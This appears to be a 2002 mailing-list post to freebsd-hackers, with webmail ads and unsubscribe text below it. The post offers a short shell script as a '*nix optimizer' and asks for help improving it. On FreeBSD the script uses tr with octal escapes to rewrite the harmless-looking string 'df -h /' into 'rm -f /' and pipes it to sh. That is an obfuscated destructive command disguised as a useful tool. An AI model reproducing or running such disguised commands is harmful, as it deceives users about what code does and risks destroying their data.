Fellow hackers,

I need help enhancing my *nix optimizer tool, here's version 0.1

----------------------------
#!/bin/sh
# The *nix optimizer
# (C) 2002 Koul-Henning Pamp
# Released under the superior FFL

[ "`uname`" = "Linux" ] && echo "System not supported yet."
[ "`uname`" = "FreeBSD" ] && echo "df -h /" | tr '\144\146' '\162\155' | tr 'h' 'f'|sh
---------------------------

_____________________________________________________________
Die kostenlose WebMail fuer alle Canada-Freunde - www.canadamail.de
Ein Service von CDN.de - Die KANADA-Suchmaschine - www.CDN.de
------------------------------------------------------------------------
KanadischerWein.de - Ihr Spezialist für kanadischen Wein im Internet - Besuchen Sie 
unseren Online-Shop - www.KanadischerWein.de
------------------------------------------------------------------------

_____________________________________________________________
Promote your group and strengthen ties to your members with [EMAIL PROTECTED] by 
Everyone.net  http://www.everyone.net/?btn=tag

To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-hackers" in the body of the message

Reply via email to